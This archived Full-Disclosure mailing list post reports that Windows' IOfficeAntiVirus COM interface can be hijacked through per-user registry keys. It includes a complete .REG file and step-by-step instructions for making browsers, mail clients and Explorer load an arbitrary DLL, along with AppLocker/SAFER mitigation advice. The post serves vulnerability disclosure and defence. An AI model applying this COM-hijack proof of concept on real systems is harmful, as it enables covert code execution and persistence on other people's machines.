[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Defense in depth -- the Microsoft way (part 66): attachment manager allows to load arbitrary DL
From: "Stefan Kanthak" <stefan.kanthak () nexgo ! de>
Date: 2020-03-28 0:07:04
Message-ID: BA138D54B50443EBB6925506D16B6670 () H270
[Download RAW message or body]
Hi @ll,
this is the continuation of the previous posts
<https://seclists.org/fulldisclosure/2020/Mar/45> and
<https://seclists.org/fulldisclosure/2020/Mar/48>.
(Un)fortunately the IOfficeAntiVirus interface (see
<https://support.microsoft.com/en-us/help/914922/microsoft-windows-defender-helps-provide-real-time-protection>)
has at least another weakness which also allows (unprivileged users) to
load arbitrary DLLs into web browsers, mail/news clients, instant
messengers, file explorer and every other program which calls this COM
interface.
With Windows 2000, Microsoft introduced the "merged view" of the
[HKEY_CLASSES_ROOT] virtual registry tree: see
<https://msdn.microsoft.com/en-us/library/ms724498.aspx>
"Thanks" to this feature, COM categories/classes/interfaces registered
by (unprivileged) users below [HKEY_CURRENT_USER\Software\Classes]
obscure the corresponding COM categories/classes/interfaces registered
(by administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]
Demonstration:
~~~~~~~~~~~~~~
On a 32-bit installation of Windows XP SP2 or any newer version of
Windows perform the following steps (adaption for 64-bit installations
is left as an exercise to the reader):
1. Log on to an arbitrary (unprivileged) user account.
2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
and save it in an arbitrary directory.
3. Create a text file SENTINEL.REG with the following contents:
--- SENTINEL.REG ---
REGEDIT4
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented
Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="<path>\\SENTINEL.DLL" ; replace <path> with the directory used in step 2.
"ThreadingModel"="Both"
; NOTE: the following entries are optional!
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}" ; IUnknown
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
--- EOF ---
4. Double-click the file SENTINEL.REG to merge it into the user's
registry.
5. Download an arbitrary file with your web browser, for example
<https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>,
or save an attachment in your mail client, and notice the
message boxes displayed from the sentinels.
NOTE: the batch script
<https://skanthak.homepage.t-online.de/download/MSOAV.CMD>
performs all these steps on 32-bit and 64-bit installations
of Windows XP and newer versions of Windows.
Mitigation:
~~~~~~~~~~~
Use AppLocker or SAFER alias Software Restriction Policies: see
<https://skanthak.homepage.t-online.de/SAFER.html>
stay tuned, and NEVER use Windows without SAFER or AppLocker
Stefan Kanthak
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic